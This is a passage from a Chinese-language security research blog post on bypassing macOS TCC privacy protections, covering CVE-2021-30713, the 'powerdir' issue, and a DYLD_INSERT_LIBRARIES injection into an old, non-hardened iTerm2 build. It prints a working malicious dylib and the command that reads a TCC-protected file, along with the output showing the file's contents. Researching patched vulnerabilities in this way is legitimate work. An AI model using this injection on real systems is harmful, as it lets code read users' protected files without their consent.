argv[])&#123;</span><br><span class="line">    pwn();</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>root权限运行完后，重新打开shell，这时<code>~</code>就会变成修改后的目录，访问桌面等文件夹也不会有提示。但是运行sudo的时候，会有弹窗提示，运行完后，访问屏幕也还是会有提示。</p>
<h2 id="Bundle-结论问题-CVE-2021-30713"><a href="#Bundle-结论问题-CVE-2021-30713" class="headerlink" title="Bundle 结论问题(CVE-2021-30713)"></a>Bundle 结论问题(CVE-2021-30713)</h2><p>该漏洞滥用了 macOS 推断应用程序包信息的方式。例如，假设攻击者知道通常具有麦克风访问权限的特定应用程序。在这种情况下，他们可以将其应用程序代码植入目标应用程序的包中，并“继承”其 TCC 功能。</p>
<p>已在macOS Big Sur 11.4上进行了修复。</p>
<p>这个漏洞被用于APT攻击，以偷偷截取用户桌面。</p>
<p><img src="https://img2.helpnetsecurity.com/posts2021/Jamf-xcsset-screenshot-taking.jpg"></p>
<h2 id="“powerdir”漏洞"><a href="#“powerdir”漏洞" class="headerlink" title="“powerdir”漏洞"></a>“powerdir”漏洞</h2><p>看一下CVE-2020-9934的补丁</p>
<p><img src="https://www.microsoft.com/security/blog/uploads/securityprod/2022/01/Fig5-macOS-TCC-tccd-fix.png"></p>
<p>打了补丁之后，<em>TCC.db</em>路径是通过user_password-&gt;pw_dir来获取的，这样不管$HOME变量怎么设置，是不影响后面的TCC的。</p>
<h3 id="复现-3"><a href="#复现-3" class="headerlink" title="复现"></a>复现</h3><p>按以下步骤试了几次，没有成功修改home目录。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1.获取指定应用的csreq blob</span></span><br><span class="line"><span class="comment"># 2.制作一个假的TCC.db，设置需要的权限和csreq blob</span></span><br><span class="line"><span class="comment"># 3.使用dsexport导出用户的目录服务</span></span><br><span class="line"><span class="comment"># 4.修改用户目录服务entry以修改用户的home目录</span></span><br><span class="line"><span class="comment"># 5.使用dsimport导入修改后的目录服务entry</span></span><br><span class="line"><span class="comment"># 6.重启tccd进程</span></span><br></pre></td></tr></table></figure>

<h1 id="绕过技术"><a href="#绕过技术" class="headerlink" title="绕过技术"></a>绕过技术</h1><h2 id="iTerm2"><a href="#iTerm2" class="headerlink" title="iTerm2"></a>iTerm2</h2><p>也可以是其他任何程序，这里以iTerm2为例，假定其具有全盘访问权限。</p>
<p>可以通过以下命令看到：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db</span><br><span class="line">SQLite version 3.36.0 2021-06-18 18:58:49</span><br><span class="line">Enter <span class="string">&quot;.help&quot;</span> <span class="keyword">for</span> usage hints.</span><br><span class="line">sqlite&gt; SELECT service, client, hex(csreq), auth_value FROM access WHERE client=<span class="string">&quot;com.googlecode.iterm2&quot;</span>;</span><br><span class="line">kTCCServiceSystemPolicyAllFiles|com.googlecode.iterm2|FADE0C00000000C40000000100000006000000060000000F0000000200000015636F6D2E676F6F676C65636F64652E697465726D32000000000000070000000E000000000000000A2A864886F7636406010900000000000000000006000000060000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A483756375859565137440000|2</span><br></pre></td></tr></table></figure>

<p>下面base64编码的来源，是<code>FADE0...00</code>（二进制数据）转base64得来的，使用以下代码解码<code>csreq</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">// clang -framework Foundation -framework Security tcc.m -o tcc</span><br><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line">#import &lt;Security/Security.h&gt;</span><br><span class="line"></span><br><span class="line">int main(int argc, const char* argv[]) &#123;</span><br><span class="line">    NSString* base64CSReq = @&quot;+t4MAAAAAMQAAAABAAAABgAAAAYAAAAPAAAAAgAAABVjb20uZ29vZ2xlY29kZS5pdGVybTIAAAAAAAAHAAAADgAAAAAAAAAKKoZIhvdjZAYBCQAAAAAAAAAAAAYAAAAGAAAADgAAAAEAAAAKKoZIhvdjZAYCBgAAAAAAAAAAAA4AAAAAAAAACiqGSIb3Y2QGAQ0AAAAAAAAAAAALAAAAAAAAAApzdWJqZWN0Lk9VAAAAAAABAAAACkg3VjdYWVZRN0QAAA==&quot;;</span><br><span class="line">    NSData* csReqData = [[NSData alloc] initWithBase64EncodedString:base64CSReq options:0];</span><br><span class="line"></span><br><span class="line">    SecRequirementRef secRequirement = NULL;</span><br><span class="line">    SecRequirementCreateWithData((__bridge CFDataRef)csReqData, kSecCSDefaultFlags, &amp;secRequirement);</span><br><span class="line">    CFStringRef requirementText = NULL;</span><br><span class="line">    SecRequirementCopyString(secRequirement, kSecCSDefaultFlags, &amp;requirementText);</span><br><span class="line">    NSLog(@&quot;decoded csreq: %@&quot;, (__bridge NSString*)requirementText);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line">// output</span><br><span class="line">// 2022-03-15 11:02:02.520 tcc[72892:3255935] decoded csreq: anchor apple generic and identifier &quot;com.googlecode.iterm2&quot; and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = H7V7XYVQ7D)</span><br></pre></td></tr></table></figure>

<p>从这串解码后的字符串可以看出，<code>csreq</code>包含：</p>
<ul>
<li>应用程序的捆绑标识符信息</li>
<li>用于签署应用程序的开发者证书</li>
</ul>
<p>利用思路：<strong>可以获取旧版本的“donate”应用程序（没有<code>hardened runtime</code>标志），注入它，从而滥用其 TCC 权限</strong>。</p>
<blockquote>
<p>⚠️从macOS 10.15 Catalina开始，默认情况下，所有的应用程序都必须经过公证才能启动。没有这个标志，意味着程序可以被恶意进程修改。</p>
<p>没有则flags&#x3D;0x0(none)，有则flags&#x3D;0x10000(runtime)</p>
</blockquote>
<h3 id="复现-4"><a href="#复现-4" class="headerlink" title="复现"></a>复现</h3><p>下载一个旧版本的<a target="_blank" rel="noopener" href="https://iterm2.com/downloads/stable/iTerm2-2_1_4.zip">iTerm2-2_1_4.zip</a>，查看签名信息，没有<code>hardened runtime</code>标志，但有相同的csreq。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">pwn@pwns-Mac ~ % codesign -d -v -r- ~/Desktop/iTerm.app          </span><br><span class="line">Executable=/Users/pwn/Desktop/iTerm.app/Contents/MacOS/iTerm</span><br><span class="line">Identifier=com.googlecode.iterm2</span><br><span class="line">Format=app bundle with Mach-O universal (i386 x86_64)</span><br><span class="line">CodeDirectory v=20200 size=15145 flags=0x0(none) hashes=750+3 location=embedded</span><br><span class="line">Signature size=8549</span><br><span class="line">Timestamp=Oct 4, 2015 at 9:18:53 PM</span><br><span class="line">Info.plist entries=33</span><br><span class="line">TeamIdentifier=H7V7XYVQ7D</span><br><span class="line">Sealed Resources version=2 rules=12 files=82</span><br><span class="line">designated =&gt; identifier <span class="string">&quot;com.googlecode.iterm2&quot;</span> and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = H7V7XYVQ7D</span><br></pre></td></tr></table></figure>

<p>编译一个恶意的dylib：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line"></span><br><span class="line">__attribute__((constructor)) static void pwn(int argc, const char **argv) &#123;</span><br><span class="line">    NSLog(@&quot;[+] injected to %@&quot;, [[NSBundle mainBundle] bundleIdentifier]);</span><br><span class="line">    </span><br><span class="line">    NSString *path = [@&quot;~/Desktop/secret_data.txt&quot; stringByExpandingTildeInPath];</span><br><span class="line">    NSString *contents = [NSString stringWithContentsOfFile:path encoding:NSUTF8StringEncoding error:nil];</span><br><span class="line">    NSLog(@&quot;[+] Contents of TCC-protected file: %@&quot;, contents);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过命令行进行注入，不过没成功，显示open命令没有env选项：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">open /tmp/iTerm2-2_1_4.app --<span class="built_in">env</span> DYLD_INSERT_LIBRARIES=/tmp/libtccChecker.dylib</span><br></pre></td></tr></table></figure>

<p>大概通过DYLD_INSERT_LIBRARIES实现的：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DYLD_INSERT_LIBRARIES=~/Desktop/mal.dylib ~/Desktop/iTerm.app/Contents/MacOS/iTerm </span><br></pre></td></tr></table></figure>

<p>能看到注入成功的输出结果：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">2022-03-14 21:44:58.416 iTerm[831:13729] [+] injected to com.googlecode.iterm2</span><br><span class="line">2022-03-14 21:44:58.416 iTerm[831:13729] [+] Contents of TCC-protected file: password</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/macos/" rel="tag"># macos</a>
              <a href="/tags/tcc/" rel="tag"># tcc</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/01/10/iOS-CVE-2021-30909/" rel="prev" title="CVE-2021-30909">
                  <i class="fa fa-angle-left"></i> CVE-2021-30909
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/01/11/XNU-turnstile-use-after-free-CVE-2021-30916/" rel="next" title="XNU: turnstile use after free(CVE-2021-30916)">
                  XNU: turnstile use after free(CVE-2021-30916) <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">buffer0verflooow</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
